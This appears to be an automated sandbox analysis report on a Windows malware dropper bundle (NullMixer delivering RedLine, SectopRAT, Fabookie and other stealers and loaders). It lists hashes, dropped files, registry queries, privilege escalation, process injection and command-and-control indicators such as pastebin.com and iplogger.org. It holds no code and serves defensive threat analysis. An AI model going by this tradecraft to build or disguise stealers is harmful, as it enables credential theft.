SHA512 0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2060ea1c5d8fae8aa.exe

MD5 ba8541c57dd3aae16584e20effd4c74c
SHA1 5a49e309db2f74485db177fd9b69e901e900c97d
SHA256 dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c
SHA512 1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d

C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-PMFSC.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-PMFSC.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-24 21:35
Reported: 2024-11-24 21:37
Platform: win10v2004-20241007-en
Max time kernel: 15s
Max time network: 121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"

Signatures

Detect Fabookie payload

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

OnlyLogger payload

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20e095683c2b3a0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2776 set thread context of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20e095683c2b3a0c.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 548 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 548 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 548 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4196 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe
PID 4196 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe
PID 4196 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe
PID 4604 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 216 wrote to memory of 4900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 216 wrote to memory of 4900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 216 wrote to memory of 4900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4604 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
